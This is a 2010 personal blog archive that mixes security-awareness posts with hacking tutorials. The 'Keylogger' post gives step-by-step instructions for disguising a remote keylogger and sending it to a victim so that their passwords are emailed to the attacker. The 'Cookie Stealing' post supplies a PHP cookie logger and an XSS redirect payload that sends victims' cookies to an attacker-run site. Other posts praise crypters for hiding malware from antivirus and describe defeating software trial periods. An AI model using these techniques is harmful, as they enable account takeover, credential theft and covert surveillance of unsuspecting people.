Arpit Tripathi's Blog: May 2010

Saturday, May 29, 2010

Crypters

I have already written about Keyloggers in my previous articles. I have mentioned about antiviruses detecting keyloggers as Viruses and hence, hacker has to use Crypters to avoid antivirus detection for keyloggers.

What is Crypter?

Generally, antivirus work by splitting source code of application and then search for certain string within source code. If antivirus detects any certain malicious strings, it either stops scan or deletes the file as virus from system. A crypter is a program that allow users to crypt the source code of their program. Thus Crypter is free software used to hide viruses, keyloggers or any RAT tool from antiviruses so that they are not detected and deleted by antiviruses.

What does Crypter do?

Crypter simply assigns hidden values to each individual code within source code. Thus, the source code becomes hidden. Hence, our sent crypted trojan and virus bypass antivirus detection and our purpose of hacking them is fulfilled without any AV hindrance. Not only does this crypter hide source code, it will unpack the encryption once the program is executed.

What is FUD?

FUD: Fully UnDetectable. With increased use of Crypters to bypass antiviruses, Anti-Virus became more advanced and started including crypter definitions to even detect crypter strings within code. So, use of crypter to hide keylogger and RATs became more complicated as nowadays, no publicly available crypter is FUD.

Thursday, May 27, 2010

Zero Day Exploits

After reading my blogs here, most of my friends ask me about zero day. So here it goes for all.....

A zero day exploit is when the exploit for the vulnerability is created before, or on the same day as the vulnerability is learned about by the vendor.
A zero-day exploit is when someone takes advantage of a security vulnerability on the same day that the vulnerability becomes generally known.

Once a person identifies that an application or program contains a potential security vulnerability, that person can notify the publisher of the application or program so that action can be taken to repair or patch the vulnerability or defend against its exploitation. The worst part of a zero day exploit is that some companies may not react fast enough to fix or patch the vulnerability. This will leave many users exposed and many might already be infected. The good news is that sometimes the hackers can’t expose or distribute the exploit faster than the fix. Hopefully this happens more often and suppresses any wrong doing from the hackers.

Hackers are getting smarter and are able to expose vulnerabilities much faster. In some cases, a hacker may be the first to discover the vulnerability. In these situations, the vulnerability and the exploit may become apparent on the same day. There is no way to guard against the exploit before it happens.

The best thing you can do to protect against zero-day exploits is to follow good security policies in the first place. By installing and keeping your anti-virus software up to date nd keeping your system patched against the vulnerabilities you are already aware of.

Wednesday, May 26, 2010

Rouge Security Programs

Rogue security applications are also known as Scareware because they try to frighten users into thinking they need to buy a certain program. They looks like legitimate-anti-virus, anti-spyware and anti-malware products. These rogue applications appear beneficial from a security perspective but provide little or no protection, generate misleading alerts; essentially, they are malware, pretending to be genuine Internet security programs, and they aim to steal your money, private information etc.

How do Rogue Programs propagate?
Rogues are propagated in a variety of ways, using social engineering tactics to deceive and mislead people. For example:
1. You may see an ad for a security software product pop-up on your PC as your browsing the Web, warning you that your PC is infected with malware, prompting you to download a specific program to remove it.
2. You may see messages that appear to come from your operating system, telling you that your system is infected, and pushing you to take a certain action, like visit a website or download a program.

What do these programs do?
Rogue security software might report a virus, even though your computer is actually clean. The software might also fail to report viruses when your computer is infected. Inversely, sometimes, when you download rogue security software, it will install a virus or other malicious software on your computer so that the software has something to detect.

Update Yourself
There are many sites that have fragments of information about rogues or just aren’t updated regularly enough to be useful. In the Lavasoft Rogue Gallery (http://www.lavasoft.com/mylavasoft/rogues), you’ll find the names of every rogue seen, a screenshot of its user interface and additional information about it.

Be Careful With Short URL

URL Shortners are websites that claim to make the url small so that you can have a customized url and don't need to send the long URL to anyone (e.g. "bit.ly", "tr.im" etc.). They are very popular with social networking sites such as twitter where there is a character limit to what you can post. The best thing about it is - its free !

URL shortening services work by redirection and this conceals the URL of the actual website you are landing on to. So, someone could send you a link that says "http://bit.ly/dtFGUq" and actually send you to "http://www.techpandit.in/". Security is a big concern here because you may get redirected to a website (hosted by the hacker) that hosts some browser exploit to download malware on your system or run some evil script on your browser before you know it.

"For every new invention, there is a equal and opposite invention". There is a website called "http://longurl.org/". It will expand and show you every small url that you type in. So, next time you receive such shortened links use this website and be sure that you are getting redirected to the correct website.

Thursday, May 20, 2010

Remote Access to Any Computer From Anywhere

TeamViewer is a simple and fast solution for remote control, desktop sharing and file transfer that works behind any firewall and NAT proxy. With TeamViewer you can remotely control any computer as if you were sitting right in front of it - even through firewalls. All your partner has to do is start a small application, which does not even require installation or administrative rights. To connect to desired computer just run TeamViewer on the desired computer (to whom you want to connect). With the first start teamviewer ID and Password are generated on the computer. Now make a account on http://www.teamviewer.com/ . If you already have account go to web login. After login it will ask you the teamviewer id and password of the computer to whom you want to connect. Fill these information and it will create a secure connection between your computer and desired computer. The software can also be used for presentations, where you can show your own desktop to a partner.

You can read about features of Teanviewer here http://www.teamviewer.com/products/benefits.aspx

Track Your Sent Mail

E-mail tracking is a method for monitoring the e-mail delivery to intended recipient.E-mail tracking is useful when the sender wants to know if the intended recipient actually received the e-mail, or if they clicked the links. However, due to the nature of the technology, e-mail tracking cannot be considered an absolutely accurate indicator that a message was opened or read by the recipient.

Most e-mail marketing software provides tracking features ( e.g. ReadNotify.com ), but they are not free. WhoReadMe offers you commercial service, but FREE of charges and will notify you when your e-mails get read or forwarded. WhoReadMe tells you read duration, recipient actual location, organization name, operating system, etc.

Full features of WhoReadMe version 3 can be checked here http://whoreadme.com/full-features.html
To read more about WhoReadMe, visit the link http://whoreadme.com/faq.html

Wednesday, May 19, 2010

Off Topic : Flash Tutorials

Packet Sniffing

Network monitoring or packet sniffing tools are like many other infosec tools. They can be used for good or evil, it all depends on the intent of the user. A packet sniffer can be used legitimately by a network or system administrator to monitor and troubleshoot network traffic.

In its simple form a packet sniffer simply captures all of the packets of data that pass through a given network interface. Typically, the packet sniffer would only capture packets that were intended for the machine. However, if placed into promiscuous mode, the packet sniffer is also capable of capturing ALL packets traversing the network regardless of destination.( Ethernet cards have a filter that prevents the host machine from seeing traffic addressed to other stations. Sniffing programs turn off the filter, and thus see everyones traffic.)

By placing a packet sniffer on a network in promiscuous mode, a malicious intruder can capture and analyze all of the network traffic. Within a given network, username and password information is generally transmitted in clear text which means that the information would be viewable by analyzing the packets being transmitted.

A packet sniffer can only capture packet information within a given subnet. Detecting rogue packet sniffers on your network is not an easy task. By its very nature the packet sniffer is passive. It simply captures the packets that are traveling to the network interface it is monitoring. There are ways to identify network interfaces on your network that are running in promiscuous mode though and this might be used as a means for locating rogue packet sniffers.

There are various categories of network monitoring tools:

1. Capture and analyze in detail all the packets on the wire or in the air.

(e.g., Wireshark(formerly called Ethereal) and 'Cain and Abel' ).

You can learn more about wireshark from http://wheelersoftware.com/articles/wireshark-tutorial.html

You can learn more about CAIN and ABEL from http://www.thehackerslibrary.com/?p=414

2. Show general characteristics of the network traffic (e.g., EtherApe or ntop).

3. Only show counts of packets to/from the host itself (e.g., iptraf).

I recommend you become familiar with network monitors or packet sniffers such as Wireshark. Learn what types of information can be discerned from the captured data and how you can put it to use to keep your network running smoothly. But, also be aware that users on your network may be running rogue packet sniffers, either experimenting out of curiosity or with malicious intent, and that you should do what you can to make sure this does not happen.

Tuesday, May 18, 2010

Run Trail Software Forever

There are some small utilities that allow you to run a program in the specified date and time. These utilities don't change the current system date and time of your computer, but only inject the date/time that you specify into the desired application. You can run multiple applications simultaneously, each application works with different date and time, while the real date/time of your system continues to run normally. One of them is RunAsDate.

RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.RunAsDate doesn't require any installation process. In order to start using it, run RunAsDate.exe. In the main window of RunAsDate, select the desired date and time and the application that you want to run. Sometimes it will not work if the trail period of software has passed. Thus better you run it within the trail period and put the same date in the main window.

When the Immediate Mode is turned on, RunAsDate inject the date/time immediately when the process starts, without waiting to the kernel loading. However, this mode can also cause troubles to some applications, especially if they were written in .NET. If executing an application from RunAsDate cause it to crash, you should turn off the 'Immediate Mode'.

Supported OS:

Windows 2000, Windows XP, Windows Server 2003, Windows Server 2008, Windows Vista, and Windows 7.

Sunday, May 16, 2010

Keylogger

The simplest way to hack victim's password is by using a keylogger. Keyloggers are also known as spy software. A keylogger is a small program that monitors each and every keystroke that user types on a specific computer’s keyboard. To use it you don’t need to have any special knowledge. Anyone with a basic knowledge of computer can use it.

Follow these steps to install it on remote computer:

1. Download Winspy keylogger software from http://www.win-spy.com/
2. After downloading the software, run it. You will be asked to register yourself . You will be asked to enter a Userid and Password. Remember this password as it will be required in uninstalling the software.
3. Now, another box will come, that tells you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger.
4. On pressing hot keys, a login box will come asking userid and password. Enter them and click OK
5. After that Winspy’s main screen will be displayed.
6. Select Remote at top, then Remote install.
7. On doing this, you will get a popup that will ask following information.

User – Type victim’s name
File name – Name the file to be sent. Use the name such that victim will love to accept it.
File icon – Keep it the same.
Picture – Select the image you want apply to the keylogger.
Email keylog to – Enter your Email address. Hotmail & Yahoo doesn't accept Keylog Files so enter other email address.

8. After that click on “Create Remote file”. Now just add your image to a winrar archive and send this file to your victim. When victim will open this file,keylogger is installed on victim's computer and all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords .

Monday, May 10, 2010

Cookie Stealing

Cookie stealing is one of the most fundamental aspect of XSS (cross site scripting). Cookies are used to store valuable information such as Username, Password, IP address and much more, and thats why cookie is so important. Cookie stealing is a process of getting and changing other people’s cookies.

Go to a website that requires a login and after logging erase everything in addressbar and type "javascript:alert(document.cookie)" and press enter. You should see a pop-up window with some information of your login details like username, password etc. It may be possible that cookie contains paswords in hash but with some luck hashes, can be cracked. Sometimes it may also be possible to just paste the hash in your cookie at right place and you are able to login with victim's account.

This does not mean that to get an victim’s password, you have to get him to sit down, login, make him to type script that show you the alert box. You have to be smart and use tricks. These tricking techniques are something known as social engineering. All you have to do is fool victim. For example, after login make him to click on a page/link that contains the malicious script.

For cookie stealing first, you have to find the XSS vulnerability. Any website that allows you to post text potentially allows you to insert your own code into the website. Some examples of these types of sites are forums, guestbooks, any site with profile option, etc. Most websites apply some sort of filter to input. XSS deals with finding exploits within filters, allowing you to put your own code into website.

Example:
Get a free web host that supports PHP and make a new file. In the new file, type in this:

$cookie=$_GET['cookie'] . "\n";
$fh=fopen('evil.txt','ab');
fwrite($fh,$cookie);
fclose($fh);
?>

save it as evil.php. Now make an empty text file named evil.txt.

Lets assume that we have a website that has user login as well as profile option and doesn't have any kind of filtering on. This means that you can put HTML and Javascript in your profile. If in your profile you write the following code.

document.location=http://yourwebsite.com/evil.php?cookie=document.cookie

whenever someone views your profile he will be redirected to you script with their cookie in URL. If you were look at evil.txt now, you would see the cookie of victim.
You can steal the cookie of victim's mail accounts by simply mailing the victim a e-mail that contains the link of script. If the victim clicks on link you are able to get the information that is stored in his cookie. You can hide the scripts in image also.

Sunday, May 9, 2010

Phishing Exposed

One day and find a e-mail from your Google that seems suspicious, specially since it threatens to close your account if you don't reply. What do you do?

This message and others like it are examples of phishing. The act of sending an e-mail to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft. The e-mail directs the user to visit a Web site (uploaded by phishers) where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers. The Web site, however, looks like original but it is fake and set up only to steal the user’s information. Phishers can also infect computers with viruses and convince people to participate unwittingly in money laundering.

Most people associate phishing with e-mail messages that spoof, or mimic, banks and credit card companies, mail accounts or other business like Amazon and eBay. These e-mails look authentic and attempt to get victims to reveal their personal information. E-mail is the most common way to distribute phishing lures, but some scammers seek out victims through: Instant messages, Cell phone text (SMS) messages, Chat rooms, Fake banner ads, Message boards and mailing lists etc.

As there are several methods from which one can send a e-mail from others account by just knowing him/her e-mail id. One of them is sending e-mail through cmd. Once phishers know who their victims are, phishers create methods for delivering the message and collecting the data. Most often, this involves e-mail addresses and a Web page. Phishers record the information of victims from the Web pages or popup windows, which are filled by victims. The phishers use the information they've gathered to make illegal purchases or otherwise commit fraud.

Phishers often use company logos and legitimate e-mail messages, with links that direct the victim to a fraudulent page. They use spoofed, or fake, e-mail addresses in the "From:" and "Reply-to" fields of the message, and they use obfuscate links (misspelled versions of the company url, Using alternate formats, like hexadecimal etc) to make them look legitimate. Most phishing messages give the victim a reason to take immediate action, prompting him to act first and think later.

Tips for users

1. Always check the url before filling your personal information.

2. If it is asking for username n password, first try login with wrong one. If it not fake, it will identify that your password is wrong.

Friday, May 7, 2010

E-mail With Command Prompt

Write E-mail from CMD

Follow these Steps

1. Open the cmd prompt ( Start -> Run -> Type cmd -> Press Enter ).

2. Type telnet server port -> Press Enter and wait for response.

[ server: Outgoing Mail Server, port : Smtp Server Port Number (default 25)]

3. Type HELO server.com -> Press Enter and wait for response

[Some servers accept 'ELHO' in place of 'HELO']

4. Type MAIL FROM: senders email id -> Press Enter and wait for response

5. Type RCPT TO: recipants email ids -> Press Enter and wait for response

[seprated by ',']

6. Type DATA: Your Message.

[To end the message, put a single dot '.' on a line by itself and press Enter.]

Warnings for users

Google Mail server uses TLS in sending Email and dos telnet does not supports TLS.

Hotmail and some other mail services do not allow telnet access to their mail servers.This can be tracked by anyone with enough technical skill, access to your ISP's records, and a bit of determination, so don't do anything you wouldn't want to possibly be associated with you.

Check E-mail from CMD

Telnet can be used as another way to check email.

Follow these Steps

1. Open the cmd prompt ( Start -> Run -> Type cmd -> Press Enter ).

2. Type telnet emailprovider.com port -> Press Enter and wait for response

[emailprovider: Incoming Mail Server, port: Server Port Number (default POP3/IMAP 110/143)].

3. Type USER yourusername -> Press Enter and wait for response

[you may see what you type or not, and "yourusername" should be changed to whatever comes before the @ in your email address.]

4. Then type in PASS yourpassword -> Press Enter and wait for response

[if you can see what you type, you will see your password]

5. Type list -> Press Enter and wait for response.

6. You will see a list of items with labels like "1 1024" and "2 123556". If you want to look at the message labeled 2 123556, type retr 2. You can replace the 2 with any other number to view other messages.If you want to delete message 1 1024, type dele 1.

[When you are done checking your email, type quit and press Enter.]

Mail Server Settings

Hotmail Settings : As other web based email services, Hotmail is using the HTTP protocol for connecting you to your mailbox. If you want to send and receive Hotmail emails using an email client software, then your software must support Hotmail HTTP access for your email account. Some email clients, such as Outlook Express or Microsoft Outlook, offer builtin support for Hotmail accounts, so you only have to select HTTP when you are asked to select your email account type and select Hotmail as the HTTP Mail Service Provider.

Hotmail Incoming Mail Server (POP3) - pop3.live.com (logon using Secure Password Authentification - SPA, mail server port: 995)

Hotmail Outgoing Mail Server (SMTP) - smtp.live.com (SSL enabled, port 25)

Yahoo! Mail Settings : Yahoo Mail offers standard POP3 access for receiving emails incoming through your Yahoo mailbox, by using your favorite email client software. To setup your email client for working with your Yahoo account, you need to select the POP3 protocol and use the following mail server settings:

Yahoo Incoming Mail Server (POP3) - pop.mail.yahoo.com (port 110)

Yahoo Outgoing Mail Server (SMTP) - smtp.mail.yahoo.com (port 25)

POP Yahoo! Mail Plus email server settings.

Yahoo Plus Incoming Mail Server (POP3) - plus.pop.mail.yahoo.com (SSL enabled, port 995)

Yahoo Plus Outgoing Mail Server (SMTP) - plus.smtp.mail.yahoo.com (SSL enabled, port 465, use authentication)

Google GMail Settings : The Google GMail service offers email client access for retrieving and sending emails through your Gmail account. However, for security reasons, GMail uses POP3 over an SSL connection, so make sure your email client supports encrypted SSL connections.

Google Gmail Incoming Mail Server (POP3) - pop.gmail.com (SSL enabled, port 995)

Outgoing Mail Server - use the SMTP mail server address provided by your local ISP or smtp.gmail.com (SSL enabled, port 465)

MSN Mail Settings : The MSN email service allows you to use the MSN POP3 and SMTP servers to access your MSN mailbox.

MSN Incoming Mail Server (POP3) - pop3.email.msn.com (port 110, using Secure Password Authentication - SPA)

MSN Outgoing Mail Server - smtp.email.msn.com (select "My outgoing server requires authentication")

AOL Mail Settings : The AOL email service is a web based system, designed for managing your AOL mailbox via HTTP IMAP access. Unlike Hotmail, you can use any email client to access your AOL mailbox, as long as it supports the IMAP protocol.

AOL Incoming Mail Server (IMAP) - imap.aol.com (port 143)

AOL Outgoing Mail Server - smtp.aol.com or use your local ISP SMTP mail server

Mail.com Mail Settings.

Thursday, May 6, 2010

My First Blog

Welcome to my first BLOG entry. People who know me, have asked me for years why I dont start one. Now they will probably be asking to themselves: Arpit, a blog?? Well all the cool kids are doing it and I now realize that there is so much information that I come across that is truly useful, so I thought I should have a go at it too.

In many cases the ideas dont require an entire article anyway. Blogging seems to make a lot of sense as an actual time saver for me. Don't expect me writing about my personal life much here, this will mostly be a log of hacking activities (Web as well as Network), with occasional other stuff thrown in.

Thanks to the folks who’ve been pestering me to blog for a year or so. Thanks for reading and I hope all my time and effort helps (or at least entertains) you on many levels.

Visit to this blog regulerly for interesting stuff. That’s enough for now. I’ll try to do this twice a week or so.